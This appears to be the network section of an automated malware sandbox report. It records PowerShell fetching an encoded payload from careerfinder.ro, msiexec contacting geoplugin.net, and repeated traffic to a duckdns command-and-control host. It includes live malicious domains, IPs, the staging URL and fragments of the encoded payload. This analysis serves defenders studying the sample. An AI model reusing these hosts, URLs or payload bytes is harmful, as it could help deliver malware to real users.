                                                                  Oct 16, 2024 13:08:20.180059910 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.180061102 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.180068970 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.180079937 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.180100918 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.180155039 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.180183887 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.180207968 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.180217981 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.180227041 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.180298090 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.180306911 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.180308104 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.180318117 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.180392981 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.180659056 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.180777073 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.180864096 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.181214094 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.181225061 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.181242943 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.181252003 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.181263924 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.181273937 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.181282997 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.181305885 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.181358099 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.181365967 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.181406021 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.181495905 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.182178020 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182188988 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182200909 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182210922 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182220936 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182229996 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182245970 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182255983 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182266951 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182276011 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182282925 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.182287931 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182297945 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182336092 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182343960 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182389975 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.182427883 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182437897 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182445049 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.182447910 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182559967 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.182581902 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182591915 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182609081 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182619095 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182629108 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182636976 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182657957 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.182719946 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.182733059 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182782888 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182791948 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182802916 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182806015 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.182908058 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.182955980 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182965994 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.182976007 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183005095 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183013916 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183041096 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.183096886 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.183459044 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183476925 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183557987 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.183681965 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183692932 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183702946 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183769941 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.183789968 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183840036 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183845043 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.183849096 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183940887 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.183942080 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183969975 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.183979034 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184051037 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.184129000 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184205055 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.184241056 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184250116 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184319973 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184329033 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184329033 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.184339046 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184348106 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184416056 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.184443951 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184494019 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184503078 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.184580088 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.185312033 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185337067 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185345888 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185425043 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.185442924 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185451984 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185518980 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.185548067 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185556889 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185566902 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185575962 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185595989 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185622931 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.185631990 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185642958 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185652971 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185674906 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.185712099 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185762882 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.185826063 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185834885 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185847044 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185899019 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185909033 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185918093 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.185944080 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185954094 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185964108 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.185998917 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.186048031 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.186068058 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186100960 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186129093 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.186177015 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186187029 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186218977 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186248064 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186254025 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.186258078 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186307907 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186342955 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.186589956 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186618090 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186626911 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186655045 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.186691046 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.187064886 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187074900 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187153101 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.187211990 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187222958 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187232018 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187283039 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187300920 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.187342882 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187352896 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187361956 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187418938 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.187442064 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187453985 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187534094 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.187561035 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187570095 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187580109 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187589884 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187664032 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.187700033 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187711954 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187721014 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187788963 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187793970 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.187798977 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187845945 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187872887 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.187921047 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.187937021 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187946081 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187956095 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.187975883 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.188023090 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.188067913 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.188077927 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.188086987 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:20.188097000 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.188165903 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:20.189032078 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:23.481637001 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:23.486500025 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.486531973 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.486572027 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.486587048 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.486612082 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:23.486612082 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:23.486634970 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.486644983 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:23.486665010 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.486757994 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.486769915 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.486780882 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.486807108 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.491482973 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.491504908 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.491535902 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.491547108 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.491566896 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.491642952 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.491655111 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.551141024 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:23.556657076 CEST538484989494.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:23.556729078 CEST4989453848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:29.019367933 CEST538484988794.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:29.020740032 CEST4988753848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:29.025717020 CEST538484988794.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:59.082875013 CEST538484988794.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:08:59.084712982 CEST4988753848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:08:59.089556932 CEST538484988794.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:09:29.133788109 CEST538484988794.198.96.165192.168.2.5
                                                                  Oct 16, 2024 13:09:29.135312080 CEST4988753848192.168.2.594.198.96.165
                                                                  Oct 16, 2024 13:09:29.140217066 CEST538484988794.198.96.165192.168.2.5

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Oct 16, 2024 13:07:26.064728975 CEST5805953192.168.2.51.1.1.1
                                                                  Oct 16, 2024 13:07:26.109891891 CEST53580591.1.1.1192.168.2.5
                                                                  Oct 16, 2024 13:08:15.094805956 CEST5695653192.168.2.51.1.1.1
                                                                  Oct 16, 2024 13:08:15.230496883 CEST53569561.1.1.1192.168.2.5
                                                                  Oct 16, 2024 13:08:17.126616001 CEST5618953192.168.2.51.1.1.1
                                                                  Oct 16, 2024 13:08:17.133737087 CEST53561891.1.1.1192.168.2.5

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Oct 16, 2024 13:07:26.064728975 CEST192.168.2.51.1.1.10x91d6Standard query (0)careerfinder.roA (IP address)IN (0x0001)false
                                                                  Oct 16, 2024 13:08:15.094805956 CEST192.168.2.51.1.1.10xf553Standard query (0)iniiivan.duckdns.orgA (IP address)IN (0x0001)false
                                                                  Oct 16, 2024 13:08:17.126616001 CEST192.168.2.51.1.1.10x8d50Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Oct 16, 2024 13:07:26.109891891 CEST1.1.1.1192.168.2.50x91d6No error (0)careerfinder.ro185.248.196.6A (IP address)IN (0x0001)false
                                                                  Oct 16, 2024 13:08:15.230496883 CEST1.1.1.1192.168.2.50xf553No error (0)iniiivan.duckdns.org94.198.96.165A (IP address)IN (0x0001)false
                                                                  Oct 16, 2024 13:08:17.133737087 CEST1.1.1.1192.168.2.50x8d50No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                  HTTP Request Dependency Graph

                                                                  • careerfinder.ro
                                                                  • geoplugin.net

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.549895178.237.33.50806764C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Oct 16, 2024 13:08:17.139307022 CEST71OUTGET /json.gp HTTP/1.1
                                                                  Host: geoplugin.net
                                                                  Cache-Control: no-cache
                                                                  Oct 16, 2024 13:08:17.984025002 CEST1164INHTTP/1.1 200 OK
                                                                  date: Wed, 16 Oct 2024 11:08:17 GMT
                                                                  server: Apache
                                                                  content-length: 956
                                                                  content-type: application/json; charset=utf-8
                                                                  cache-control: public, max-age=300
                                                                  access-control-allow-origin: *
                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 44 61 6c 6c 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c [TRUNCATED]
                                                                  Data Ascii: { "geoplugin_request":"155.94.241.186", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Dallas", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"623", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"32.8137", "geoplugin_longitude":"-96.8704", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.549704185.248.196.64433664C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-10-16 11:07:27 UTC178OUTGET /vn/Traurigheder.sea HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                  Host: careerfinder.ro
                                                                  Connection: Keep-Alive
                                                                  2024-10-16 11:07:27 UTC459INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  cache-control: public, max-age=0
                                                                  expires: Wed, 16 Oct 2024 11:07:27 GMT
                                                                  content-type: application/octet-stream
                                                                  last-modified: Tue, 15 Oct 2024 11:20:36 GMT
                                                                  accept-ranges: bytes
                                                                  content-length: 472124
                                                                  date: Wed, 16 Oct 2024 11:07:27 GMT
                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                  2024-10-16 11:07:27 UTC16384INData Raw: 36 77 4a 50 68 33 45 42 6d 37 74 6b 30 68 41 41 63 51 47 62 36 77 4a 33 70 77 4e 63 4a 41 52 78 41 5a 76 72 41 6b 44 31 75 58 53 6b 47 32 42 78 41 5a 74 78 41 5a 75 42 36 66 31 2f 43 68 56 78 41 5a 76 72 41 69 62 42 67 63 47 4a 32 2b 36 30 63 51 47 62 36 77 4b 47 61 48 45 42 6d 33 45 42 6d 37 70 2f 61 42 79 31 63 51 47 62 36 77 4c 61 39 65 73 43 71 34 56 78 41 5a 73 78 79 6e 45 42 6d 2b 73 43 6c 51 71 4a 46 41 74 78 41 5a 76 72 41 6b 70 30 30 65 4a 78 41 5a 76 72 41 6d 74 6e 67 38 45 45 63 51 47 62 63 51 47 62 67 66 6c 63 6b 4f 67 43 66 4d 78 78 41 5a 74 78 41 5a 75 4c 52 43 51 45 36 77 4c 42 61 65 73 43 70 4e 32 4a 77 2b 73 43 72 36 56 78 41 5a 75 42 77 35 78 38 4a 51 46 78 41 5a 74 78 41 5a 75 36 2f 7a 4f 45 45 4f 73 43 7a 6a 39 78 41 5a 75 42 38 71 46
                                                                  Data Ascii: 6wJPh3EBm7tk0hAAcQGb6wJ3pwNcJARxAZvrAkD1uXSkG2BxAZtxAZuB6f1/ChVxAZvrAibBgcGJ2+60cQGb6wKGaHEBm3EBm7p/aBy1cQGb6wLa9esCq4VxAZsxynEBm+sClQqJFAtxAZvrAkp00eJxAZvrAmtng8EEcQGbcQGbgflckOgCfMxxAZtxAZuLRCQE6wLBaesCpN2Jw+sCr6VxAZuBw5x8JQFxAZtxAZu6/zOEEOsCzj9xAZuB8qF
                                                                  2024-10-16 11:07:27 UTC16384INData Raw: 37 36 4c 6b 31 35 49 39 70 68 33 49 33 53 32 4b 38 35 47 57 69 57 34 6c 4d 62 4f 75 6d 6b 44 66 4d 6d 4d 69 53 42 59 76 31 75 67 6c 63 68 49 65 4a 64 70 54 53 49 6a 62 44 67 67 6d 37 47 52 77 74 4d 7a 4c 50 6c 74 2b 52 53 59 78 59 46 6e 79 75 57 52 51 7a 47 6d 43 74 68 2f 67 50 2b 6a 4a 74 32 2f 5a 57 35 73 36 69 7a 4d 48 49 6f 6a 43 35 59 45 50 6d 6c 34 53 59 69 56 41 39 4f 67 6d 4d 74 55 38 4a 41 56 64 6a 6f 4d 79 37 44 38 44 4a 61 77 73 49 38 38 59 32 77 42 50 6d 35 53 4a 2b 62 73 44 6c 63 30 76 33 78 6d 66 5a 2b 71 6a 4e 7a 35 68 48 75 2f 34 56 39 37 67 50 32 45 65 34 44 39 68 48 75 41 2f 59 52 37 67 50 32 45 65 34 44 39 68 48 75 41 2f 59 52 37 67 50 32 45 42 4d 4c 47 56 56 4b 66 6a 53 78 32 6f 4a 61 73 30 37 7a 35 79 58 75 41 2f 59 52 37 67 50 32 45
